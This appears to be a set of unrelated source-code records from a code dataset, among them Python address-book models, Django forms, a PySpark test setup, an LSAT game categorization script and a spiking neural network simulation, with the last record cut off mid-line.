(MIT)\n#\n# Copyright (c) 2016 Adam York\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated\n# documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to\n# permit persons to whom the Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all copies or substantial portions of\n# the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO\n# THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF\n# CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n\"\"\"\nClasses as objects.\nClasses in this module represent a person, relationship, and comment.\n\"\"\"\n\n\nclass Person(object):\n \"\"\"\n\n A person class which represents a person in the address book.\n\n Attributes:\n person_id: Person identifier (row identifier)\n first_name: First name.\n last_name: Last Name.\n middle_initial. Middle Initial.\n nick_name: Nick Name.\n date_of_birth: Date of birth in YYYY-MM-DD format.\n date_of_death: Date of death in YYYY-MM-DD format.\n relatives: A list of assigned relationship(s) to another person.\n identities: A list of associated identities (identification).\n addresses: A list of address.\n contacts: A list of contacts.\n comments: A list of comments.\n\n \"\"\"\n def __init__(self):\n self.person_id = None\n self.first_name = None\n self.last_name = None\n self.middle_initial = None\n self.nick_name = None\n self.date_of_birth = None\n self.date_of_death = None\n self.relatives = []\n self.identities = []\n self.addresses = []\n self.contacts = []\n self.comments = []\n\n\nclass Relationship(object):\n \"\"\"\n\n A person relationship.\n\n Attributes:\n\n person_id: The person identifier for which this relationship is assigned.\n related_person_id: The person identifier for which this person is related.\n relationship_type: The type of relationship between two people as designated by the assigned relationship.\n relationship_id: The identifier for the relationship (a row identifier)\n relationship_type_description: The description of the relationship type.\n related_person_relationship_type: The related person's relationship type.\n person = Person(). Inherited from Person\n\n \"\"\"\n\n def __init__(self):\n self.person_id = None\n self.related_person_id = None\n self.relationship_type = None\n self.relationship_id = None\n self.relationship_type_description = None\n self.related_person_relationship_type = None\n self.person = Person() # TODO: reactor Relationship and Relatiohship2 into a properly inherited class\n\n\nclass Relationship2(Person):\n \"\"\"\n\n A person relationship.\n\n Attributes:\n\n person_id: The person identifier for which this relationship is assigned.\n related_person_id: The person identifier for which this person is related.\n relationship_type: The type of relationship between two people as designated by the assigned relationship.\n relationship_id: The identifier for the relationship (a row identifier)\n relationship_type_description: The description of the relationship type.\n related_person_relationship_type: The related person's relationship type.\n person = Person(). 
Inherited from Person\n\n \"\"\"\n\n def __init__(self):\n self.person_id = None\n self.related_person_id = None\n self.relationship_type = None\n self.relationship_id = None\n self.relationship_type_description = None\n self.related_person_relationship_type = None\n\n\nclass Comment(object):\n \"\"\"\n\n Person comment class.\n\n Attributes:\n person_id: Person identifier for which the comment belongs.\n comment: Comment content.\n comment_id: Comment identifier (row identifier)\n\n \"\"\"\n def __init__(self):\n self.person_id = None\n self.comment = None\n self.comment_id = None\n","sub_path":"addressbook/models/people.py","file_name":"people.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"488359991","text":"x=input(\"enter the string to check\")\r\nlen=0\r\nrev=\"\"\r\nfor i in x:\r\n len=len+1\r\nwhile len>0:\r\n rev+=x[len-1]\r\n len=len-1\r\nif x==rev:\r\n print(\"its a palindrome\")\r\nelse:\r\n print(\"its not a palindrome\")\r\n","sub_path":"palindrome or not.py","file_name":"palindrome or not.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"452059361","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function\n\nfrom unittest import TestCase\n\nfrom tests.utils import assert_equal_layers\n\nfrom polyaxon_schemas.ml.initializations import (\n GlorotUniformInitializerConfig,\n ZerosInitializerConfig\n)\nfrom polyaxon_schemas.ml.layers.local import LocallyConnected1DConfig, LocallyConnected2DConfig\n\n\nclass TestLocalConfigs(TestCase):\n @staticmethod\n def assert_local_config(local_class, dim):\n config_dict = {\n 'filters': 20,\n 'kernel_size': 3,\n 'strides': 1 if dim == 1 else [1, 1],\n 'padding': 'valid',\n 'data_format': None,\n 'activation': None,\n 'use_bias': True,\n 'kernel_initializer': GlorotUniformInitializerConfig().to_schema(),\n 'bias_initializer': ZerosInitializerConfig().to_schema(),\n 'kernel_regularizer': None,\n 'bias_regularizer': None,\n 'activity_regularizer': None,\n 'kernel_constraint': None,\n 'bias_constraint': None,\n }\n if dim > 1:\n config_dict['data_format'] = None\n config = local_class.from_dict(config_dict)\n assert_equal_layers(config, config_dict)\n\n def test_local_config(self):\n self.assert_local_config(LocallyConnected1DConfig, 1)\n self.assert_local_config(LocallyConnected2DConfig, 2)\n","sub_path":"tests/test_ml/test_layers/test_local.py","file_name":"test_local.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"291563454","text":"from cloudinary.forms import CloudinaryFileField\nfrom django import forms\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom django.forms import CheckboxInput, EmailInput, ModelForm, NumberInput, \\\n Select, TextInput\nfrom django.forms.utils import ErrorList\n\nfrom .models import Collection, Manga\n\n\nclass SignUpForm(UserCreationForm):\n email = forms.EmailField(max_length=254, help_text='Requis. 
Saisissez une adresse email valide.')\n\n class Meta:\n model = User\n fields = ['username', 'email', 'password1', 'password2']\n widgets = {\n 'username': TextInput(attrs={'class': 'form-control'}),\n 'email': EmailInput(attrs={'class': 'form-control'}),\n 'password1': TextInput(attrs={'class': 'form-control'}),\n 'password2': TextInput(attrs={'class': 'form-control'})\n }\n\n\nclass DivErrorList(ErrorList):\n def __str__(self):\n return self.as_divs()\n\n def as_divs(self):\n if not self:\n return ''\n return '
<div class=\"errorlist\">%s</div>' % ''.join(['<div class=\"error\">%s</div>
' % e for e in self])\n\n\nclass CollectionForm(ModelForm):\n def __init__(self, *args, **kwargs):\n\n user_collection = Collection.objects.filter(owner=kwargs.pop('owner'))\n\n super(CollectionForm, self).__init__(*args, **kwargs)\n self.fields['manga'].queryset = Manga.objects.exclude(\n pk__in=[collection.manga.pk for collection in user_collection]\n )\n\n class Meta:\n model = Collection\n fields = ['manga', 'owned_volumes']\n widgets = {\n 'manga': Select(attrs={'class': 'form-control'}),\n 'owned_volumes': NumberInput(attrs={'class': 'form-control'})\n }\n\n\nclass CollectionUpdateForm(ModelForm):\n class Meta:\n model = Collection\n fields = ['owned_volumes']\n widgets = {\n 'owned_volumes': NumberInput(attrs={'class': 'form-control'})\n }\n\n\nclass MangaForm(ModelForm):\n class Meta:\n model = Manga\n fields = ['title', 'cover', 'synopsis', 'total_volumes', 'is_finished']\n widgets = {\n 'title': TextInput(attrs={'class': 'form-control'}),\n 'total_volumes': NumberInput(attrs={'class': 'form-control'}),\n 'is_finished': CheckboxInput(attrs={'class': 'form-control'})\n }\n\n cover = CloudinaryFileField(\n options={\n 'crop': 'scale',\n 'folder': 'mangas',\n 'format': 'jpg',\n 'height': 360,\n 'tags': 'manga_cover',\n 'width': 250,\n }\n )\n","sub_path":"collection/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"247023612","text":"\n\n#calss header\nclass _SOMBRE():\n\tdef __init__(self,): \n\t\tself.name = \"SOMBRE\"\n\t\tself.definitions = [u'serious, sad, and without humour or entertainment: ', u'dark and plain: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_sombre.py","file_name":"_sombre.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"591772935","text":"# Copyright (C) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See LICENSE in project root for information.\n\nfrom pyspark.sql import SparkSession, SQLContext\nimport os\n\nspark = SparkSession.builder \\\n .master(\"local[*]\") \\\n .appName(\"PysparkTests\") \\\n .config(\"spark.jars.packages\", \"com.microsoft.ml.spark:mmlspark_2.11:\" + os.environ[\"MML_VERSION\"]) \\\n .config(\"spark.executor.heartbeatInterval\", \"60s\") \\\n .config(\"spark.sql.shuffle.partitions\", 10) \\\n .config(\"spark.sql.crossJoin.enabled\", \"true\") \\\n .getOrCreate()\n\nsc = SQLContext(spark.sparkContext)\n","sub_path":"src/test/python/mmlsparktest/spark.py","file_name":"spark.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"236926838","text":"A = int(input(\"Enter a number\"))\narr = []\nfor i in range(1,A+1):\n count = 0\n for j in range(1,i+1):\n if i%j == 0:\n count=count+1\n if count==2:\n print(i)\n arr.append(i)\nprint(arr)\nprint(sum(arr))","sub_path":"python_basics_01.py/Sum_of_prime_nums.py","file_name":"Sum_of_prime_nums.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"589521888","text":"# -*- coding: iso-8859-1 -*-\n#\n# $Id: mako_utils.py,v 1.12 2012/08/08 07:21:15 xantgui Exp $\n#\n# Copyright (c) Ericsson Espaņa S.A., 2011.\n# All rights reserved.\n#\n# This product or document is proprietary to and embodies the\n# confidential technology of Ericsson Espaņa S.A.\n# Possession, use, duplication or distribution of this product\n# or document is authorized only pursuant to a valid written\n# license from Ericsson Espaņa S.A\n#\n\n\"\"\"\nThis files contains function used inside the mako's\n\"\"\"\nimport yaml\nfrom NSTpyfw.utils.execution_mode import ExecutionMode\nfrom NSTpyfw.utils.exception.framework import NoInformationAboutTheNode, InvalidOption\n\ndef get_mako_release(dist_info, execution_mode):\n \"\"\"\n Function used to retrieve the correct mako file that is needed for a specific\n SASN version and execution mode\n @param dist_info: Information of the distribuition of SASN\n @param execution_mode: Execution mode of the current execution\n @return: Name of the mako file\n \"\"\"\n if dist_info is None:\n raise NoInformationAboutTheNode()\n ## End If\n release_config = yaml.load(file(\"/opt/nstest/config/mako-release-config.yml\"))\n version = dist_info.get_distribution_module_info(\"SASN\").version\n\n if ExecutionMode().get_is_ssr(execution_mode):\n if ExecutionMode().get_execution_mode(execution_mode) in [\"hl\", \"ssr_hl\"]:\n actual_config = release_config[\"hl\"][\"ssr\"]\n elif \"ipos\" == execution_mode:\n actual_config = release_config[\"ipos\"][\"ssr\"]\n else:\n actual_config = release_config[\"com\"][\"ssr\"]\n version = dist_info.get_distribution_module_info(\"SSR\").version\n ## End If\n elif ExecutionMode().get_is_vsasn(execution_mode):\n if \"hl\" == ExecutionMode().get_execution_mode(execution_mode):\n actual_config = release_config[\"hl\"][\"vsasn\"]\n else:\n actual_config = release_config[\"com\"][\"vsasn\"]\n ## End If\n else:\n actual_config = release_config[\"hl\"][\"oracle\"]\n ## End If\n\n return actual_config.get(version, actual_config[\"default\"])\n## END METHOD get_mako_release()\n\ndef get_mako_minconfig(dist_info, execution_mode):\n \"\"\"\n Function used to retrieve the correct mako minimum config file that is needed\n for a specific SASN version and execution mode\n @param dist_info: Information of the distribuition 
of SASN\n @param execution_mode: Execution mode of the current execution\n @return: Name of the mako file\n \"\"\"\n if dist_info is None:\n raise NoInformationAboutTheNode()\n ## End If\n\n if ExecutionMode().get_is_ssr(execution_mode):\n actual_config = \"gi-com-minconfig-13-2.mako\"\n else:\n raise InvalidOption(\"execution_mode\", execution_mode)\n ## End If\n\n return actual_config\n## END METHOD get_mako_minconfig()\n","sub_path":"sds/back_test/ref/utils/mako_helper.py","file_name":"mako_helper.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"258427697","text":"import pandas as pd\n\ndef load(file):\n '''\n loads game categorizations and returns a array\n ready for conversion into a pandas DataFrame\n '''\n\n array = []\n with open(file) as f:\n line = f.readline().strip()\n while line:\n month, year, published_as = line.strip().split(' ', 2)\n flag = published_as.find('PrepTest')\n if flag > 0:\n _, test_num = published_as.rsplit(' ', 1)\n test_num = int(test_num[:-1])\n else:\n test_num = 0\n for game_num in range(1, 5): # index games from 1 to 4\n _, _, game_attr = f.readline().strip().split(' ', 2)\n game_attr = game_attr.split(', ') # yields a list of varying length\n game_type = game_attr[0].split(': ')\n if len(game_type) == 1:\n game_type += [''] + [''] # fill missing entries\n elif len(game_type) == 2:\n game_type += [''] # fill missing entries\n game_id = [month, year, published_as[1:-1], test_num, game_num]\n # drop parentheses around publication info\n own_col = ['missing'] # for ownership fill with default value\n all_cols = game_id + game_type + own_col + game_attr[1:]\n array.append(all_cols)\n line = f.readline().strip()\n return array\n\ndef read_prompts():\n names = ['Book_One_prompts.txt', 'Vol_V_prompts.txt', 'New_Actual.txt', '10_Actual.txt']\n for name in names:\n type = 'error'\n print (name)\n with open('../data/' + name) as f:\n line = f.readline().strip()\n while line != '--END--':\n #print (line)\n if line[:4]==\"####\":\n contents = line.split(' ')\n _, *type, _ = contents\n line = f.readline().strip()\n if line[:3]==\"###\":\n contents = line.split(' ')\n # print ('lenth of line 2', len(contents))\n _, month, year, _, game_num, _ = contents\n #line = f.readline().strip()\n # print\n #print (name, *type, 'mo', month, 'yr', year, 'game', game_num)\n line = f.readline().strip()\n prompt = []\n while line[:2]!='##':\n prompt.append(line)\n line = f.readline().strip()\n #print (\"prompt line\", line)\n #line = f.readline() # eat spacer\n rule_list = []\n line = f.readline().strip()\n while line[:2]!='##' and line!='--END--':\n rule_list.append(line)\n line = f.readline().strip()\n #print (\"rule line\", line)\n # print (name, *type, 'mo', month, 'yr', year, 'game', game_num)\n # print (\"PROMPT:\")\n # print (prompt)\n # print (\"rules:\")\n # print (rule_list)\n # print (month, year, int(game_num))\n subset = df[df.year==year]\n subset = subset[subset.month==month]\n subset = subset[subset.game_num==int(game_num)] #(df.game_num==int(game_num))]\n #print (month, year, int(game_num))\n try:\n idx = subset.index.tolist()[0]\n prompts[idx] = prompt\n rules[idx] = rule_list\n except:\n print (\"error: missing\", month, year, int(game_num))\n\ndef get_owned(df):\n df.loc[df.test_num.isin(range(1, 21)), 'own'] = 'Book One'\n df.loc[df.test_num.isin(range(21, 41)), 'own'] = 'Book Two' # missing PrepTest 41\n df.loc[df.test_num.isin(range(42, 52)), 'own'] = '10 
Actual'\n df.loc[df.test_num.isin(range(52, 62)), 'own'] = '10 New Actual'\n df.loc[df.test_num.isin(range(62, 72)), 'own'] = 'Vol V'\n df.loc[(df.month == 'June') & (df.year == '2007'), 'own'] = 'Free'\n return df[df.own != 'missing']\n\ndef get_counts(input, col_names):\n type_counts = input.groupby('primary_type').count().secondary_type.to_frame(col_names[0])\n type_counts[col_names[1]] = type_counts[col_names[0]] * 100/ len(input)\n return type_counts\n\ndef save_pickle(file, name):\n with open(\"classification_data/\" + name + \".pkl\", 'w') as f:\n pickle.dump(file, f)\n print (\"done pickling \", name)\n\ndef load_pickle(name):\n '''\n returns unpickled file\n '''\n with open(\"classification_data/\" + name + \".pkl\") as f_un:\n file_unpickled = pickle.load(f_un)\n print (\"done unpickling \", name)\n return file_unpickled\n\nif __name__ == '__main__':\n pd.set_option('display.max_rows', 500)\n pd.set_option('display.width', 300)\n\n file = 'Games_Classifications.txt'\n cols = ['month', 'year', 'published_as', 'test_num', 'game_num', 'primary_type', \\\n 'secondary_type', 'tertiary_type', 'own', 'notes1', 'notes2', 'notes3']\n array = load(file)\n\n df = pd.DataFrame(array, columns=cols)\n df.index = df.index + 1 # since game_num starts at 1, test_num should too\n #df['indices'] = df.index\n # for convenience create various subsets of the df:\n df_owned = get_owned(df) # games I own ~ training data\n bible_games = df[df.values == 'Bible'] # games dissected in PowerScore's Bible\n tests_inventory = df.groupby('own').count() # inventory of where owned games reside\n total_type_counts = get_counts(df, ['total_counts', 'percent_overall'])\n owned_type_counts = get_counts(df_owned, ['owned_counts', 'percent_of_owned'])\n combined_type_counts = pd.concat([total_type_counts,owned_type_counts], axis=1)\n combined_type_counts['held_out'] = combined_type_counts['total_counts']- \\\n combined_type_counts['owned_counts']\n combined_type_counts['percent_held'] = combined_type_counts['held_out'] * 100/ \\\n combined_type_counts['total_counts']\n\n all_seq_games = df[df.primary_type=='Pure Sequencing']\n seq_games_owned = all_seq_games[all_seq_games.own != 'missing']\n print (\"Total sequencing games:\", len(all_seq_games))\n print (\"Owned sequencing games:\", len(seq_games_owned))\n\n prompts = [[] for i in range(df.shape[0])]\n rules = [[] for i in range(df.shape[0])]\n #print ('init as', prompts)\n read_prompts()\n df.game_num[9]=2 # manual correction of wierd error\n df.game_num[35]=1 # manual correction of wierd error\n df.primary_type[9]='Basic Linear' # manual correction of wierd error\n df.primary_type[35]='Basic Linear' # manual correction of wierd error\n counter = 0\n df['keyed_pr'] = False\n for i, p in enumerate(prompts):\n if len(p)>0:\n counter += 1\n print (counter, df.index[i], df.year[i], df.month[i], df.primary_type[i], df.own[i])\n df.keyed_pr[i] = True\n keyed = df[df.keyed_pr] # subset = those with prompts and rules keyed in\n\n print (\"Total sequencing games:\", len(all_seq_games))\n print (\"Owned sequencing games:\", len(seq_games_owned))\n print (df[(df.own=='10 Actual') & (df.primary_type=='Pure Sequencing')])\n '''\n total_counts percent_overall owned_counts percent_of_owned held_out percent_held\nAdvanced Linear 85 23.876404 71.0 25.000000 14.0 16.470588\nBasic Linear 79 22.191011 67.0 23.591549 12.0 15.189873\nCircular Linearity 5 1.404494 2.0 0.704225 3.0 60.000000\nGrouping 122 34.269663 97.0 34.154930 25.0 20.491803\nGrouping/Linear Combination 21 5.898876 16.0 
5.633803 5.0 23.809524\nLinear/Grouping Combination 2 0.561798 NaN NaN NaN NaN\nLinear/Mapping Combination 1 0.280899 NaN NaN NaN NaN\nMapping 1 0.280899 1.0 0.352113 0.0 0.000000\nMapping-Spatial Relations 2 0.561798 2.0 0.704225 0.0 0.000000\nMapping-Supplied Diagram 3 0.842697 3.0 1.056338 0.0 0.000000\nPattern 12 3.370787 8.0 2.816901 4.0 33.333333\nPure Sequencing 23 6.460674 17.0 5.985915 6.0 26.086957\n\n\n2 6 1991 October Pure Sequencing Book One\n3 7 1991 October Basic Linear Book One\n4 10 1991 December Basic Linear Book One\n5 11 1991 December Basic Linear Book One\n6 13 1991 December Grouping Book One\n7 14 1992 February Pure Sequencing Book One\n8 15 1992 February Grouping Book One\n9 18 1992 June Basic Linear Book One\n10 19 1992 June Grouping Book One\n11 20 1992 June Grouping Book One\n12 23 1992 October Pure Sequencing Book One\n13 26 1992 December Grouping Book One\n14 29 1992 December Grouping Book One\n15 30 1993 February Basic Linear Book One\n16 34 1993 June Basic Linear Book One\n17 36 1993 June Basic Linear Book One\n18 39 1993 October Grouping Book One\n19 42 1994 February Pure Sequencing Book One\n20 46 1994 June Grouping Book One\n21 48 1994 June Grouping Book One\n22 51 1994 October Grouping Book One\n23 52 1994 October Grouping Book One\n24 54 1994 December Grouping Book One\n25 55 1994 December Basic Linear Book One\n26 58 1995 February Grouping Book One\n27 62 1995 June Basic Linear Book One\n28 65 1995 June Grouping Book One\n29 66 1995 September Grouping Book One\n30 70 1995 December Basic Linear Book One\n31 71 1995 December Grouping Book One\n32 78 1996 June Basic Linear Book One\n33 80 1996 June Grouping Book One\n34 81 1996 June Grouping Book One\n35 187 2004 June Pure Sequencing 10 Actual\n36 207 2005 December Pure Sequencing 10 Actual\n37 217 2006 September Pure Sequencing 10 Actual\n38 221 2006 December Pure Sequencing 10 Actual\n39 229 2007 September Pure Sequencing 10 New Actual\n40 231 2007 December Pure Sequencing 10 New Actual\n41 240 2008 October Pure Sequencing 10 New Actual\n42 263 2010 October Pure Sequencing 10 New Actual\n43 266 2010 December Basic Linear Vol V\n44 269 2010 December Basic Linear Vol V\n45 271 2011 June Basic Linear Vol V\n46 272 2011 June Basic Linear Vol V\n47 273 2011 June Basic Linear Vol V\n48 274 2011 October Basic Linear Vol V\n49 278 2011 December Basic Linear Vol V\n50 281 2011 December Basic Linear Vol V\n51 283 2012 June Basic Linear Vol V\n52 287 2012 October Basic Linear Vol V\n53 294 2013 June Basic Linear Vol V\n54 298 2013 October Basic Linear Vol V\n55 302 2013 December Pure Sequencing Vol V\n56 305 2013 December Basic Linear Vol V\n\n\nKEYED month year published_as test_num game_num secondary_type tertiary_type own notes1 notes2 notes3 keyed_pr\nprimary_type\nBasic Linear 24 24 24 24 24 24 24 24 8 0 0 24\nGrouping 18 18 18 18 18 18 18 18 15 3 0 18\nPure Sequencing 14 14 14 14 14 14 14 14 2 0 0 14\n'''\n","sub_path":"load_categories_df.py","file_name":"load_categories_df.py","file_ext":"py","file_size_in_byte":11619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"315131068","text":"#!/srv/conda/envs/notebook/bin/python\n\nimport sys\nfin_name = sys.argv[1]\n\nsum = 0\ncn = 0\nfor line in open(fin_name):\n sum += float(line)\n cn += 1\n\nif cn > 0:\n print(sum/cn)","sub_path":"zapiski/2022-05-17 
ukazna/average.py","file_name":"average.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"319343081","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os, subprocess\nimport PrintNNinfo as out\nfrom time import time\nimport pickle as pkl\n\n\ndef CreateERnetwork(cell_types, ps):\n n = len(ps)\n syn_types = np.arange(n*n).reshape(n, n)\n cnt_map = np.ones([len(cell_types), len(cell_types)], dtype=int) * (-1)\n \n for i, cpre in enumerate(cell_types):\n for j, cpost in enumerate(cell_types):\n if i != j:\n if np.random.uniform() < ps[cpre][cpost]:\n cnt_map[i][j] = syn_types[cpre][cpost]\n return cnt_map\n\n\ndef get_Poisson_t(f, N, tmax, dt, t0=0):\n prob = f*dt\n times = np.arange(t0, tmax, dt)\n ts = []\n for i in range(N):\n rand = np.random.uniform(low=0, high=1e3, size=len(times))\n ids = rand < prob\n ts.append(times[ids])\n return ts\n\n\ndef set_ext_types(target_ids, n_ext_exc, cell_types, ext_syn_types):\n n_ext_inh = len(target_ids) - n_ext_exc\n# ext_syn_types = [[0, 1], [2, 3]] # ext_PN -> ? / ext_Inh -> ?\n ext_types = []\n for i, tid in enumerate(target_ids):\n ext_types.append([])\n if i < n_ext_exc:\n pre = 0\n else:\n pre = 1\n for n in tid:\n ext_types[-1].append(ext_syn_types[pre][cell_types[n]])\n return ext_types\n\n\ndef read_all(prefix):\n t, v = out.readOut(prefix+'_v.csv')\n _, ii = out.readOut(prefix+'_i.csv')\n tspks = []\n for i in range(v.shape[1]):\n tspks.append(t[v[:, i] == 30])\n return t, v, ii, tspks\n\n\ndef merge_lists(a1, a2):\n arrs = []\n for a in a1:\n arrs.append(a)\n for a in a2:\n arrs.append(a)\n return arrs\n\n\ndef auto_corr(x, tmax, srate, ind=None):\n if ind is not None:\n x = x[ind]\n kmax = int(tmax * srate)\n corr = []\n ks = np.arange(0, kmax+0.1, 1) / srate\n xm = np.average(x)\n for k in range(kmax+1):\n if k == 0:\n x1 = x\n x2 = x\n else: # k > 0\n x1 = x[:-k]\n x2 = x[k:]\n s1 = np.std(x1)\n s2 = np.std(x2)\n if ((s1==0) or (s2==0)):\n corr.append(0)\n else:\n corr.append(np.sum((x1-xm)*(x2-xm))/len(x)/(np.std(x1)*np.std(x2)))\n return ks, corr\n\ndef get_sync_index(vall, ind=None):\n # vall (:, n_cells)\n if ind is None:\n ind = np.ones(vall.shape[0], dtype=bool)\n \n v_avg = np.average(vall, axis=1)\n s_all = np.std(v_avg[ind])**2\n s_cell = np.std(vall[ind, :], axis=0)\n \n numer = np.average(s_all)\n denom = np.average(s_cell**2)\n \n return numer/denom\n\ndef runSimulation(info):\n\n tic = time()\n seed = info['seed']\n\n np.random.seed(seed)\n\n # set parameters\n tmax = 200\n dt = 0.01\n\n n_exc = 100\n n_inh = 25\n\n n_stims_pos = 125\n p_stims_pos = [0.2, 0.2]\n\n # Poisson input\n f_pos = info['f']\n\n out_prefix = 'out%d'%(info['id'])\n fname = 'id_%04d_f_%03d_ext_%2d-5_seed_%d'%(info['id'], info['f'], info['gmax'], seed)\n\n # set PN cell type & cells parameter\n params_pn = {'tau':20, 'r':500, 'e':-70, 'vahp':-80, 'vth':-40, 't_refrac':5, 'v0':-65, 'vmax':30}\n params_pv = {'tau':2, 'r':500, 'e':-70, 'vahp':-80, 'vth':-40, 't_refrac':0.2, 'v0':-65, 'vmax':30}\n\n # set synapse type & parameter\n syn_pn2pn = {'gmax':1e-3, 'tau_r':0.2, 'tau_d':4.6, 'e':0, 'd':1}\n syn_pn2pv = {'gmax':1e-4, 'tau_r':0.1, 'tau_d':1.3, 'e':0, 'd':1}\n syn_pv2pn = {'gmax':1e-2, 'tau_r':0.5, 'tau_d':7.6, 'e':-80, 'd':1}\n syn_pv2pv = {'gmax':1e-3, 'tau_r':0.5, 'tau_d':7.6, 'e':-80, 'd':1}\n syn_type_params = [syn_pn2pn, syn_pn2pv, syn_pv2pn, syn_pv2pv]\n\n # set network parameters\n ps = [[0.2, 0.2], [0.3, 0.3]] # PN->PN/Inh, 
Inh->PN/Inh\n\n # background input\n ext_pn2pn = {'gmax':info['gmax']*1e-5, 'tau_r':0.2, 'tau_d':4.6, 'e':0, 'd':0}\n ext_pn2pv = {'gmax':info['gmax']*1e-5, 'tau_r':0.1, 'tau_d':1.3, 'e':0, 'd':0}\n\n ext_syn_type_params = [ext_pn2pn, ext_pn2pv]\n\n # create network\n n_cells = n_exc + n_inh\n cell_types = []\n for i in range(n_cells):\n if i < n_exc:\n cell_types.append(0)\n else:\n cell_types.append(1)\n cnt_map = CreateERnetwork(cell_types, ps)\n\n # get ids\n ids_targets = []\n for i in range(n_stims_pos):\n ids_targets.append([])\n for j in range(n_cells):\n c = cell_types[j]\n p = np.random.uniform(low=0, high=1)\n if p < p_stims_pos[c]:\n ids_targets[i].append(j)\n\n # external types\n ext_types = []\n for i in range(n_stims_pos):\n ext_types.append([])\n for ind in ids_targets[i]:\n c = cell_types[ind]\n ext_types[i].append(c)\n\n t_stims = get_Poisson_t(f_pos, n_cells, tmax, dt, t0=0)\n\n\n out.print_nn_params('./parameter/', out_prefix, cell_types, cnt_map, [params_pn, params_pv], syn_type_params,\n ids_targets, ext_types, t_stims, ext_syn_type_params, overwrite=True, ischeck=False,\n d_noise=0.3, g_noise_syn=1e-5, g_noise_ext=0)\n \n subprocess.call(['./runNetwork_w_no_print',\n '--fdir', './parameter/', '--prefix', out_prefix, '--fsave', f'./vcells_{out_prefix}', '--tmax', '%d'%(tmax),\n '--dt', '0.01', '--s', '0.2', '--seed', '%d'%(seed)])\n\n times, vall, iall, tspks = read_all(f'./vcells_{out_prefix}')\n\n si = get_sync_index(vall)\n\n with open('./result_ch/data/'+fname+'.pkl', 'wb') as f:\n pkl.dump(vall, f)\n pkl.dump(times, f)\n\n pkl.dump(tspks, f)\n pkl.dump(si, f)\n \n os.remove(f'./parameter/{out_prefix}_info.csv')\n os.remove(f'./parameter/{out_prefix}_cell.csv')\n os.remove(f'./parameter/{out_prefix}_syn.csv')\n os.remove(f'./parameter/{out_prefix}_t_spike.csv')\n\n os.remove(f'./vcells_{out_prefix}_v.csv')\n os.remove(f'./vcells_{out_prefix}_i.csv')\n\n print('%d Done, t=%.3fs'%(info['id'], time()-tic))\n\n return\n\n\nif __name__ == '__main__':\n\n import multiprocessing\n\n plt.ioff()\n\n f_range = np.linspace(1, 201, 20)\n gmax_range = np.linspace(5, 50, 20) #x1e-5\n n_mc = 5\n seeds = np.random.randint(10, 100000, n_mc)\n np.save('./result_ch/seed.npy', seeds)\n\n infos = []\n n = 0\n for seed in seeds:\n for f in f_range:\n for g in gmax_range:\n infos.append({'id':n, 'f':f, 'gmax':g, 'seed':seed})\n n += 1\n\n pool = multiprocessing.Pool(processes=18)\n\n tic = time()\n pool.map(runSimulation, infos)\n pool.close()\n pool.join()\n\n print('Execution Done, %.5fs'%(time()-tic))\n\n\n \n \n \n\n \n \n \n\n ","sub_path":"LIFnetwork_ver_C/runNetwork_character.py","file_name":"runNetwork_character.py","file_ext":"py","file_size_in_byte":6665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"59130173","text":"# coding=utf-8\nimport numpy as np\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import r2_score\n# ai_stock_1:重回帰分析による株価予測\n\n\ndef make_data(y):\n seq_len = 1\n y_data = []\n for i in range(len(y) - seq_len):\n y_data.append(y[i + seq_len])\n\n return y_data\n\n\n# get Data\ncsv_data = pd.read_csv('data/test_data.csv')\nx = csv_data.drop(['Date'], axis=1).values\ny = 